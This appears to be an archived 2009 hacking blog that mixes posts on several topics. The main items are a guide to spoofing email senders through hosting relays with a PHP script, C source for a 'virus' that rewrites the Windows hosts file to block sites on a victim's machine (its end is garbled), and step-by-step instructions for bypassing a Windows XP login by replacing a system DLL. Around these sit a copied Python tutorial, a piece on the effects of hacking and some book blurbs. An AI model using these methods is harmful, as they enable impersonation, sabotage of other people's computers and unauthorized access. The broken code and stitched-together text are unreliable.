* Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans.

Port Scanning Techniques

Port Scanning Techniques can be broadly classified into:

* Open scan
* Half- open scan
* Stealth scan
* Sweeps
* Misc

Commonly used tools for port scanning

1.Tool: SuperScan 3.0

2. Tool: NMap (Network Mapper)

3. Tool: NetScan Tools Pro 2003

4. Tool: ipEye, IPSecScan

How To Send Anonymous Emails

2009-09-13T07:55:00.000-07:00

Most of us are very curious to know a method to send anonymous emails to our friends for fun. But the question is, is it possible to send anonymous emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send anonymous emails to your friends. For example, you can send an email to your friend with the following sender details.

From: Bill Gates

The art of sending this kind emails is known as Email Spoofing. In my previous post on How to Send Fake Email I insisted on using your own SMTP server to send anonymous emails. This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoo(all major email service providers) blocks the emails that are sent directly from a PC. In this post I have come up with a new way to send anonymous emails (spoofed emails) that has 100% success rate. If you have to successfully send an anonymous email or spoofed email, you should send it using a relay server.

What is a Relay Server?

In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.

So What’s Next?

Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually all the emails that are sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email headers to insert the spoofed From address field into it.

I have created a PHP script that allows you to send emails from any name and email address of your choice. The script can be found here.

Anonymous Email Sender Script

Here is a step-by-step procedure to setup your own Anonymous Email Sender Script

1. Goto X10 Hosting and register a new account.

2. Download my Anonymous Email Sender Script (sendmail.rar).

3. Login to your FreeWebHostingArea Account and click on File Manager.

4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.

5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.

6. Now type the following URL

http://yoursite.x10hosting.com/sendmail.php

NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.

7. Use the script to send Anonymous Emails. Enjoy!!!

Tell me whether it worked or not. Please pass your comments…

WARNING: ALL THE INFORMATION PROVIDED IN THIS POST ARE FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE FOR ANY MISUSE.

A Virus Program to Block Websites

2009-09-13T07:52:00.000-07:00

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?

Here is the sourcecode of the virus.

#include
#include
#include

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++) success="0;" success="find_root();">

What are the Effects of Computer Hacking

2009-09-07T07:04:00.001-07:00

Computer hacking is the act of modifying computer hardware or software, in order to cause damage to sensitive data on a computer or to simply steal confidential information. Computer hackers often target home and office computers that are connected to the Internet. The Internet is a gateway for a computer to connect to the world, which also makes it vulnerable to attacks from hackers from across the globe. What are the consequences of computer hacking? Let us find out.

Effects of Computer Hacking

Computer hacking is a breach of computer security. It can expose sensitive user data and risk user privacy. Hacking activities expose confidential user information like personal details, social security numbers, credit card numbers, bank account data and personal photographs. User information, in the hands of computer hackers, makes it vulnerable to illegitimate use and manipulation.

Hackers may even delete sensitive information on gaining access to it. Deletion or manipulation of sensitive data with intent to achieve personal gain is another effect of computer hacking. A user whose computer has been hacked is at the risk of losing all the data stored on his/her computer. Manipulation of sensitive user data is a grave consequence of hacking.

Identity theft is another important consequence of computer hacking. Identity theft is a fraud that involves pretension to be someone else, with intent to gain unauthorized access to information or property. It refers to an illegal use of someone else's identity for personal interest or gain.

The advances in technology have led to the evolution of key-logging software, which is capable of tracking and recording every key stroke by the user, thereby stealing passwords and account details. Another serious effect of computer hacking is the denial of service attack. The DOS attack, as it is called, refers to the attempt of making computer resources unavailable to authorized users. Often, websites fall prey to denial-of-service attacks, whereby they are made unavailable for long periods of time, causing inconvenience to users while also hampering website business.

Computer hacking can lead to theft of critical business information. Important information about business clients and customers can be lost or manipulated through computer hacking. Hacking can expose email addresses to hackers, which they might use for spamming and hampering email privacy.

Information critical to national security, confidential government data, information related to national defense, security and crime, if exposed by means of hacking, can have grave consequences on the welfare of the nation. Hacking of highly sensitive data can potentially risk the national security and stake the overall well-being of the country's citizens.

Hacking can be used to convert computers into zombies i.e. Internet-enabled computers that are compromised by hackers or computer viruses. Zombie computers are used for fraudulent activities like spamming and phishing.

How can you find out whether your computer has been hacked? An unexplained decline in computer performance, an unexpected increase in file size, unexplained modifications to files, sudden changes in network settings of the computer and frequent disk crashes are some of the warning signs of a hacked computer. Installing reliable antivirus softwares, enabling a firewall before connecting to the Internet and installing operating system updates on a regular basis, can help help you combat hackers.

What could happen to you in case you hack a computer? Well, computer users have a right to secure personal information under the data protection act. Not abiding by this act can have serious consequences like heavy fines or imprisonment. The degree of punishment depends on the severity of the damage resulting from computer hacking. Hacking is a computer crime.

If only one could 'hack the brains' of hackers and 'delete' such destructive thoughts of hacking from their minds...

Instant Hacking

2009-09-07T06:53:00.000-07:00

[If you like this tutorial, please check out my book Beginning Python, or perhaps become my fan on Facebook?]

This is a short introduction to the art of programming, with examples written in the programming language Python. (If you already know how to program, but want a short intro to Python, you may want to check out my article Instant Python.) This article has been translated into Italian, Polish, Japanese, Serbian, Brazilian Portuguese, and Dutch, and is in the process of being translated into Korean.

This page is not about breaking into other people’s computer systems etc. I’m not into that sort of thing, so please don’t email me about it.

Note: To get the examples working properly, write the programs in a text file and then run that with the interpreter; do not try to run them directly in the interactive interpreter — not all of them will work. (Please don’t ask me on details on this. Check the documentation or send an email to help@python.org).
The Environment

To program in Python, you must have an interpreter installed. It exists for most platforms (including Macintosh, Unix and Windows). More information about this can be found on the Python web site. You also should have a text editor (like emacs, notepad or something similar).
What is Programming?

Programming a computer means giving it a set of instructions telling it what to do. A computer program in many ways resembles recipes, like the ones we use for cooking. For example [1]:

Fiesta SPAM Salad

Ingredients:

Marinade:
1/4 cup lime juice
1/4 cup low-sodium soy sauce
1/4 cup water
1 tablespoon vegetable oil
3/4 teaspoon cumin
1/2 teaspoon oregano
1/4 teaspoon hot pepper sauce
2 cloves garlic, minced

Salad:
1 (12-ounce) can SPAM Less Sodium luncheon meat,
cut into strips
1 onion, sliced
1 bell pepper, cut in strips
Lettuce
12 cherry tomatoes, halved

Instructions:

In jar with tight-fitting lid, combine all marinade ingredients;
shake well. Place SPAM strips in plastic bag. Pour marinade
over SPAM. Seal bag; marinate 30 minutes in refrigerator.
Remove SPAM from bag; reserve 2 tablespoons marinade. Heat
reserved marinade in large skillet. Add SPAM, onion, and
green pepper. Cook 3 to 4 minutes or until SPAM is heated.
Line 4 individual salad plates with lettuce. Spoon hot salad
mixture over lettuce. Garnish with tomato halves. Serves 4.

Of course, no computer would understand this… And most computers wouldn’t be able to make a salad even if they did understand the recipe. So what do we have to do to make this more computer-friendly? Well — basically two things. We have to (1) talk in a way that the computer can understand, and (2) talk about things that it can do something with.

The first point means that we have to use a language — a programming language that we have an interpreter program for, and the second point means that we can’t expect the computer to make a salad — but we can expect it to add numbers, write things to the screen etc.
Hello…

There’s a tradition in programming tutorials to always begin with a program that prints “Hello, world!” to the screen. In Python, this is quite simple:

print "Hello, world!"

This is basically like the recipe above (although it is much shorter!). It tells the computer what to do: To print “Hello, world!”. Piece of cake. What if we would want it to do more stuff?

print "Hello, world!"
print "Goodbye, world!"

Not much harder, was it? And not really very interesting… We want to be able to do something with the ingredients, just like in the spam salad. Well — what ingredients do we have? For one thing, we have strings of text, like "Hello, world!", but we also have numbers. Say we wanted the computer to calculate the area of a rectangle for us. Then we could give it the following little recipe:

# The Area of a Rectangle

# Ingredients:

width = 20
height = 30

# Instructions:

area = width*height
print area

You can probably see the similarity (albeit slight) to the spam salad recipe. But how does it work? First of all, the lines beginning with # are called comments and are actually ignored by the computer. However, inserting small explanations like this can be important in making your programs more readable to humans.

Now, the lines that look like foo = bar are called assignments. In the case of width = 20 we tell the computer that the width should be 20 from this point on. What does it mean that “the width is 20”? It means that a variable by the name “width” is created (or if it already exists, it is reused) and given the value 20. So, when we use the variable later, the computer knows its value. Thus,

width*height

is essentially the same as

20*30

which is calculated to be 600, which is then assigned to the variable by the name “area”. The final statement of the program prints out the value of the variable “area”, so what you see when you run this program is simply

600

Note: In some languages you have to tell the computer which variables you need at the beginning of the program (like the ingredients of the salad) — Python is smart enough to figure this out as it goes along.
Feedback

OK. Now you can perform simple, and even quite advanced calculations. For instance, you might want to make a program to calculate the area of a circle instead of a rectangle:

radius = 30

print radius*radius*3.14

However, this is not significantly more interesting than the rectangle program. At least not in my opinion. It is somewhat inflexible. What if the circle we were looking at had a radius of 31? How would the computer know? It’s a bit like the part of the salad recipe that says: “Cook 3 to 4 minutes or until SPAM is heated.” To know when it is cooked, we have to check. We need feedback, or input. How does the computer know the radius of our circle? It too needs input… What we can do is to tell it to check the radius:

radius = input("What is the radius?")

print radius*radius*3.14

Now things are getting snazzy… input is something called a function. (You’ll learn to create your own in a while. input is a function that is built into the Python language.) Simply writing

input

won’t do much… You have to put a pair of parantheses at the end of it. So input() would work — it would simply wait for the user to enter the radius. The version above is perhaps a bit more user-friendly, though, since it prints out a question first. When we put something like the question-string “What is the radius?” between the parentheses of a function call it is called passing a parameter to the function. The thing (or things) in the parentheses is (or are) the parameter(s). In this case we pass a question as a parameter so that input knows what to print out before getting the answer from the user.

But how does the answer get to the radius variable? The function input, when called, returns a value (like many other functions). You don’t have to use this value, but in our case, we want to. So, the following two statements have very different meanings:

foo = input

bar = input()

foo now contains the input function itself (so it can actually be used like foo("What is your age?"); this is called a dynamic function call) while bar contains whatever is typed in by the user.
Flow

Now we can write programs that perform simple actions (arithmetic and printing) and that can receive input from the user. This is useful, but we are still limited to so-called sequential execution of the commands, that is — they have to be executed in a fixed order. Most of the spam salad recipe is sequential or linear like that. But what if we wanted to tell the computer how to check on the cooked spam? If it is heated, then it should be removed from the oven — otherwise, it should be cooked for another minute or so. How do we express that?

What we want to do, is to control the flow of the program. It can go in two directions — either take out the spam, or leave it in the oven. We can choose, and the condition is whether or not it is properly heated. This is called conditional execution. We can do it like this:

temperature = input("What is the temperature of the spam?")

if temperature > 50:
print "The salad is properly cooked."
else:
print "Cook the salad some more."

The meaning of this should be obvious: If the temperature is higher than 50 (centigrades), then print out a message telling the user that it is properly cooked, otherwise, tell the user to cook the salad some more.

Note: The indentation is important in Python. Blocks in conditional execution (and loops and function definitions — see below) must be indented (and indented by the same amount of whitespace; a tab counts as 8 spaces) so that the interpreter can tell where they begin and end. It also makes the program more readable to humans.

Let’s return to our area calculations. Can you see what this program does?

# Area calculation program

print "Welcome to the Area calculation program"
print "–––––––––––––"
print

# Print out the menu:
print "Please select a shape:"
print "1 Rectangle"
print "2 Circle"

# Get the user's choice:
shape = input("> ")

# Calculate the area:
if shape == 1:
height = input("Please enter the height: ")
width = input("Please enter the width: ")
area = height*width
print "The area is", area
else:
radius = input("Please enter the radius: ")
area = 3.14*(radius**2)
print "The area is", area

New things in this example:

1. print used all by iself prints out an empty line
2. == checks whether two things are equal, as opposed to =, which assigns the value on the right side to the variable on the left. This is an important distinction!
3. ** is Python’s power operator — thus the squared radius is written radius**2.
4. print can print out more than one thing. Just separate them with commas. (They will be separated by single spaces in the output.)

The program is quite simple: It asks for a number, which tells it whether the user wants to calculate the area of a rectangle or a circle. Then, it uses an if-statement (conditional execution) to decide which block it should use for the area calculation. These two blocks are essentially the same as those used in the previous area examples. Notice how the comments make the code more readable. It has been said that the first commandment of programming is: “Thou shalt comment!” Anyway — it’s a nice habit to acquire.
Exercise 1

Extend the program above to include area calculations on squares, where the user only has to enter the length of one side. There is one thing you need to know to do this: If you have more than two choices, you can write something like:

if foo == 1:
# Do something…
elif foo == 2:
# Do something else…
elif foo == 3:
# Do something completely different…
else:
# If all else fails…

Here elif is a mysterious code which means “else if” :). So; if foo is one, then do something; otherwise, if foo is two, then do something else, etc. You might want to add other options to the programs too — like triangles or arbitrary polygons. It’s up to you.
Loops

Sequential execution and conditionals are only two of the three fundamental building blocks of programming. The third is the loop. In the previous section I proposed a solution for checking if the spam was heated, but it was quite clearly inadequate. What if the spam wasn’t finished the next time we checked either? How could we know how many times we needed to check it? The truth is, we couldn’t. And we shouldn’t have to. We should be able to ask the computer to keep checking until it was done. How do we do that? You guessed it — we use a loop, or repeated execution.

Python has two loop types: while-loops and for-loops. For-loops are perhaps the simplest. For instance:

for food in "spam", "eggs", "tomatoes":
print "I love", food

This means: For every element in the list "spam", "eggs", "tomatoes", print that you love it. The block inside the loop is executed once for every element, and each time, the current element is assigned to the variable food (in this case). Another example:

for number in range(1,100):
print "Hello, world!"
print "Just", 100 - number, "more to go…"

print "Hello, world"
print "That was the last one… Phew!"

The function range returns a list of numbers in the range given (including the first, excluding the last… In this case, [1..99]). So, to paraphrase this:

The contents of the loop is executed for each number in the range of numbers from (and including) 1 up to (and excluding) 100. (What the loop body and the following statements actually do is left as an exercise.)

But this doesn’t really help us with our cooking problem. If we want to check the spam a hundred times, then it would be quite a nice solution; but we don’t know if that’s enough — or if it’s too much. We just want to keep checking it while it is not hot enough (or, until it is hot enough — a matter of point-of-view). So, we use while:

# Spam-cooking program

# Fetch the function *sleep*
from time import sleep

print "Please start cooking the spam. (I'll be back in 3 minutes.)"

# Wait for 3 minutes (that is, 3*60 seconds)…
sleep(180)

print "I'm baaack :)"

# How hot is hot enough?
hot_enough = 50

temperature = input("How hot is the spam? ")
while temperature < hot_enough:
print "Not hot enough… Cook it a bit more…"
sleep(30)
temperature = input("OK. How hot is it now? ")

print "It's hot enough - You're done!"

New things in this example…

1. Some useful functions are stored in modules and can be imported. In this case we import the function sleep (which sleeps for a given number of seconds) from the module time which comes with Python. (It is possible to make your own modules too…)

Exercise 2

Write a program that continually reads in numbers from the user and adds them together until the sum reaches 100. Write another program that reads 100 numbers from the user and prints out the sum.
Bigger Programs — Abstraction

If you want an overview of the contents of a book, you don’t plow through all pages — you take a look at the table of contents, right? It simply lists the main topics of the book. Now — imagine writing a cookbook. Many of the recipes, like “Creamy Spam and Macaroni” and “Spam Swiss Pie” may contain similar things, like spam, in this case - yet you wouldn’t want to repeat how to make spam in every recipe. (OK… So you don’t actually make spam… But bear with me for the sake of example :)). You’d put the recipe for spam in a separate chapter, and simply refer to it in the other recipes. So — instead of writing the entire recipe every time, you only had to use the name of a chapter. In computer programming this is called abstraction.

Have we run into something like this already? Yup. Instead of telling the computer exactly how to get an answer from the user (OK - so we couldn’t really do this… But we couldn’t really make spam either, so there… :)) we simply used input - a function. We can actually make our own functions, to use for this kind of abstraction.

Let’s say we want to find the largest integer that is less than a given positive number. For instance, given the number 2.7, this would be 2. This is often called the “floor” of the given number. (This could actually be done with built-in Python function int, but again, bear with me…) How would we do this? A simple solution would be to try all possibilities from zero:

number = input("What is the number? ")

floor = 0
while floor <= number:
floor = floor+1
floor = floor-1

print "The floor of", number, "is", floor

Notice that the loop ends when floor is no longer less than (or equal to) the number; we add one too much to it. Therefore we have to subtract one afterwards. What if we want to use this “floor”-thing in a complex mathematical expression? We would have to write the entire loop for every number that needed “floor”-ing. Not very nice… You have probably guessed what we will do instead: Put it all in a function of our own, called “floor”:

def floor(number):
result = 0
while result <= number:
result = result+1
result = result-1
return result

New things in this example…

1. Functions are defined with the keyword def, followed by their name and the expected parameters in parentheses.
2. If the function is to return a value, this is done with the keyword return (which also automatically ends the function.

Now that we have defined it, we can use it like this:

x = 2.7
y = floor(2.7)

After this, y should have the value 2. It is also possible to make functions with more than one parameter:

def sum(x,y):
return x+y

Exercise 3

Write a function that implements Euclid’s method for finding a common factor of two numbers. It works like this:

1. You have two numbers, a and b, where a is larger than b
2. You repeat the following until b becomes zero:
3. a is changed to the value of b
4. b is changed to the remainder when a (before the change) is divided by b (before the change)
5. You then return the last value of a

Hints:

1. Use a and b as parameters to the function
2. Simply assume that a is greater than b
3. The remainder when x is divided by z is calculated by the expression x % z
4. Two variables can be assigned to simultaneously like this: x, y = y, y+1. Here x is given the value of y (that is, the value y had before the assignment) and y is incremented by one

More About Functions

How did the exercise go? Was it difficult? Still a bit confused about functions? Don’t worry — I haven’t left the topic quite yet.

The sort of abstraction we have used when building functions is often called procedural abstraction, and many languages use the word procedure along with the word function. Actually, the two concepts are different, but both are called functions in Python (since they are defined and used in the same way, more or less.)

What is the difference (in other languages) between functions and procedures? Well — as you saw in the previous section, functions can return a value. The difference lies in that procedures do not return such a value. In many ways, this way of dividing functions into two types — those who do and those who don’t return values — can be quite useful.

A function that doesn’t return a value (a “procedure”) is used as a “sub-program” or subroutine. We call the function, and the program does some stuff, like making whipped cream or whatever. We can use this function in many places without rewriting the code. (This is called code reuse — more on that later.)

The usefulness of such a function (or procedure) lies in its side effects — it changes its environment (by mixing the suger and cream and whipping it, for instance…) Let’s look at an example:

def hello(who):
print "Hello,", who

hello("world")
# Prints out "Hello, world"

Printing out stuff is considered a side effect, and since that is all this function does, it is quite typical for a so-called procedure. But… It doesn’t really change its environment does it? How could it do that? Let’s try:

# The *wrong* way of doing it
age = 0

def setAge(a):
age = a

setAge(100)
print age
# Prints "0"

What’s wrong here? The problem is that the function setAge creates it own local variable, also named age which is only seen inside setAge. How can we avoid that? We can use something called global variables.

Note: Global variables are not used much in Python. They easily lead to bad structure, or what is called spaghetti code. I use them here to lead up to more complex techniques - please avoid them if you can.

By telling the interpreter that a variable is global (done with a statement like global age) we effectively tell it to use the variable outside the function instead of creating a new local one. (So, it is global as opposed to local.) The program can then be rewritten like this:

# The correct, but not-so-good way of doing it
age = 0

def setAge(a):
global age
age = a

setAge(100)
print age
# Prints "100"

When you learn about objects (below), you’ll see that a more appropriate way of doing this would be to use an object with an age property and a setAge method. In the section on data structures, you will also see some better examples of functions that change their environment.

Well — what about real functions, then? What is a function, really? Mathematical functions are like a kind of “machine” that gets some input and calculates a result. It will return the same result every time, when presented with the same input. For instance:

def square(x):
return x*x

This is the same as the mathematical function f(x)=x2. It behaves like a nice function, in that it only relies on its input, and it does not change its environment in any way.

So — I have outlined two ways of making functions: One type is more like a procedure, and doesn’t return a result; the other is more like a mathematical function and doesn’t do anything but returning a result (almost). Of course, it is possible to do something in between the two extremes, although when a function changes things, it should be clear that it does. You could signal this through its name, for instance by using only a noun for “pure” functions like square and an imperative for procedure-like functions like setAge.
More Ingredients — data structures

Well — you know a lot already: How to get input and give output, how to structure complicated algorithms (programs) and to perform arithmetic; and yet the best is still to come.

What ingredients have we been using in our programs up until now? Numbers and strings. Right? Kinda boring… No let’s introduce a couple of other ingredients to make things a bit more exciting.

Data structures are ingredients that structure data. (Surprise, surprise…) A single number doesn’t really have much structure, does it? But let’s say we want more numbers put together to a single ingredient — that would have some structure. For instance, we might want a list of numbers. That’s easy:

[3,6,78,93]

I mentioned lists in the section on loops, but didn’t really say much about them. Well — this is how you make them. Just list the elements, separated by commas and enclosed in brackets.

Let us jump into an example that calculates primes (numbers divisible only by themselves or 1):

# Calculate all the primes below 1000
# (Not the best way to do it, but…)

result = [1]
candidates = range(3,1000)
base = 2
product = base

while candidates:
while product < 1000:
if product in candidates:
candidates.remove(product)
product = product+base
result.append(base)
base = candidates[0]
product = base
del candidates[0]

result.append(base)
print result

New things in this example…

1. The built-in function range actually returns a list that can be used like all other lists. (It includes the first index, but not the last.)
2. A list can be used as a logic variable. If it is not empty, then it is true — if it is empty, then it is false. Thus, while candidates means “while the list named candidates is not empty” or simply “while there are still candidates”.
3. You can write if someElement in someList to check if an element is in a list.
4. You can write someList.remove(someElement) to remove someElement from someList.
5. You can append an element to a list by using someList.append(something). Actually, you can use + too (as in someList = someList+[something]) but it is not as efficient.
6. You can get at an element of a list by giving its position as a number (where the first element, strangely, is element 0) in brackets after the name of the list. Thus someList[3] is the fourth element of the list someList. (More on this below.)
7. You can delete variables by using the keyword del. It can also be used (as here) to delete elements from a list. Thus del someList[0] deletes the first element of someList. If the list was [1,2,3] before the deletion, it would be [2,3] afterwards.

Before going on to explaining the mysteries of indexing list elements, I will give a brief explanation of the example.

This is a version of the ancient algorithm called “The Sieve of Erastothenes” (or something close to that). It considers a set (or in this case, a list) of candidate numbers, and then systematically removes the numbers known not to be primes. How do we know? Because they are products of two other numbers.

We start with a list of candidates containing numbers [2..999] — we know that 1 is a prime (actually, it may or may not be, depending on who you ask), and we wanted all primes below 1000. (Actually, our list of candidates is [3..999], but 2 is also a candidate, since it is our first base). We also have a list called result which at all times contains the updated results so far. To begin with, this list contains only the number 1. We also have a variable called base. For each iteration (“round”) of the algorithm, we remove all numbers that are some multible of this base number (which is always the smallest of the candidates). After each iteration, we know that the smallest number left is a prime (since all the numbers that were products of the smaller ones are removed — get it?). Therefore, we add it to the result, set the new base to this number, and remove it from the candidate list (so we won’t process it again.) When the candidate list is empty, the result list will contain all the primes. Clever, huh?

Things to think about: What is special with the first iteration? Here the base is 2, yet that too is removed in the “sieving”? Why? Why doesn’t that happen to the other bases? Can we be sure that product is always in the candidate list when we want to remove it? Why?

Now — what next? Ah, yes… Indexing. And slicing. These are the ways to get at the individual elements of Python lists. You have already seen ordinary indexing in action. It is pretty straightforward. Actually, I have told you all you need to know about it, except for one thing: Negative indices count from the end of the list. So, someList[-1] is the last element of someList, someList[-2] is the element before that, and so on.

Slicing, however, should be new to you. It is similar to indexing, except with slicing you can target an entire slice of the list, and not just a single element. How is it done? Like this:

food = ["spam","spam","eggs","sausages","spam"]

print food[2:4]
# Prints "['eggs', 'sausages']"

More Abstraction — Objects and Object-Oriented Programming

Now there’s a buzz-word if ever there was one: “Object-oriented programming.”

As the section title suggests, object-oriented programming is just another way of abstracting away details. Procedures abstract simple statements into more complex operations by giving them a name. In OOP, we don’t just treat the operations this way, but objects. (Now, that must have been a big surprise, huh?) For instance, if we were to make a spam-cooking-program, instead of writing lots of procedures that dealt with the temperature, the time, the ingredients etc., we could lump it together into a spam-object. Or, perhaps we could have an oven-object and a clock-object too… Now, things like temperature would just be attributes of the spam-object, while the time could be read from the clock-object. And to make our program do something, we could teach our object some methods; for instance, the oven might know how to cook the spam etc.

So — how do we do this in Python? Well we can’t just make an object directly. Instead of just making an oven, we make a recipe describing how ovens are. This recipe then describes a class of objects that we call ovens. A very simple oven class might be:

class Oven:
def insertSpam(self, spam):
self.spam = spam

def getSpam(self):
return self.spam

Now, does this look weird, or what?

New things in this example…

1. Classes of objects are defined with the keyword class.
2. Class names usually start with capital letters, whereas functions and variables (as well as methods and attributes) start with lowercase letters.
3. Methods (i.e. the functions or operations that the objects know how to do) are defined in the normal way, but inside the class block.
4. All object methods should have a first parameter called self (or something similar…) The reason will (hopefully) become clear in a moment.
5. Attributes and methods of an object are accessed like this: mySpam.temperature = 2, or dilbert.be_nice().

I would guess that some things are still a bit unclear about the example. For instance, what is this self thing? And, now that we have an object recipe (i.e. class), how do we actually make an object?

Let’s tackle the last point first. An object is created by calling the classname as if it were a function:

myOven = Oven()

myOven now contains an Oven object, usually called an instance of the class Oven. Let’s assume that we have made a class Spam as well; then we could do something like:

mySpam = Spam()
myOven.insertSpam(mySpam)

myOven.spam would now contain mySpam. How come? Because, when we call one of the methods of an object, the first parameter, usually called self, always contains the object itself. (Clever, huh?) Thus, the line self.spam = spam sets the attribute spam of the current Oven object to the value of the parameter spam. Note that these are two different things, even though they are both called spam in this example.
Answer to Exercise 3

Here is a very concise version of the algorithm:

def euclid(a,b):
while b:
a,b = b,a % b
return a

Recover the Password using DreamPackPL

2009-08-09T01:05:00.000-07:00

Thanks for the steps from Giftson

Steps to Hack into a Windows XP Computer without changing password:

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL http://www.d–b.webpark.pl/dreampackpl_en.htm
3. Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1? if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.
15. Type “god” in the password field to get in Windows.

You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.

Note: If you are running any kind of Anti-Virus Tool it will give you a prompt saying that it is a Virus since they have already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. The DreamPackPL helps you bypass the Windows Login screen and it is not destructive.

SQL in a Nutshell, Third Edition

2009-08-09T01:00:00.001-07:00

Description

The essential reference to the SQL language used in today's most popular database products, this new edition of SQL in a Nutshell clearly documents every SQL command according to the latest ANSI standard. It also details how these commands are implemented in the Microsoft SQL Server 2008 and Oracle 11g commercial database packages, and the MySQL 5.1 and PostgreSQL 8.3 open source database products.
Full Description
For programmers, analysts, and database administrators, SQL in a Nutshell is the essential reference for the SQL language used in today's most popular database products. This new edition clearly documents every SQL command according to the latest ANSI standard, and details how those commands are implemented in Microsoft SQL Server 2008, Oracle 11g, and the MySQL 5.1 and PostgreSQL 8.3 open source database products. You'll also get a concise overview of the Relational Database Management System (RDBMS) model, and a clear-cut explanation of foundational RDBMS concepts -- all packed into a succinct, comprehensive, and easy-to-use format. This book provides:

* Background on the Relational Database Model, including current and previous SQL standards
* Fundamental concepts necessary for understanding relational databases and SQL commands
* An alphabetical command reference to SQL statements, according to the SQL2003 ANSI standard
* The implementation of each command by MySQL, Oracle, PostgreSQL, and SQL Server
* An alphabetical reference of the ANSI SQL2003 functions, as well as the vendor implementations
* Platform-specific functions unique to each implementation

Beginning where vendor documentation ends, SQL in a Nutshell distills the experiences of professional database administrators and developers who have used SQL variants to support complex enterprise applications. Whether SQL is new to you, or you've been using SQL since its earliest days, you'll get lots of new tips and techniques in this book.

Oracle DBA Pocket Guide

2009-08-09T00:58:00.000-07:00

Description

This handy reference helps Oracle database administrators make more effective use of their time by presenting a compact summary of DBA tasks. You have instant access to the most important concepts, best practices, tips, and checklists. Key topics include architecture, installation, configuration, tuning, and backup/recovery. Covers Oracle Database 9i and Oracle Database 10g.
Full Description
The Oracle database is one of the most popular in the world, and for good reason. It's compatible, scalable, portable, and capable of performing incredibly fast. The advantages Oracle holds over its competition come with a price, however--it's a highly complex database that's becoming more complex with every release. And this level of detail, of course, can begin to weigh on database administrators (DBAs).

Fortunately, the Oracle DBA Pocket Guide from O'Reilly is on the case. This handy reference is designed to help administrators make more effective use of their time by presenting a compact summary of DBA tasks in an easy-to-use form. With this book by your side, you'll have instant access to the most important concepts, best practices, tips, and checklists. Key topics include architecture, installation, configuration, tuning, and backup/recovery. Everything that you absolutely must know to do your job well is right there at your fingertips.

Moreover, the Oracle DBA Pocket Guide covers Oracle Database 9i, as well as its latest release, Oracle Database 10g. The first database designed for enterprising grid computing, Oracle Database 10g significantly reduces the cost of managing the IT environment with a simplified install, reduced configuration and management requirements, and automatic performance diagnosis and SQL tuning.

The latest in O'Reilly's line of bestselling Oracle titles, this book is an invaluable companion for any database administrator--new or experienced--interested in reviewing core Oracle concepts at a glance.

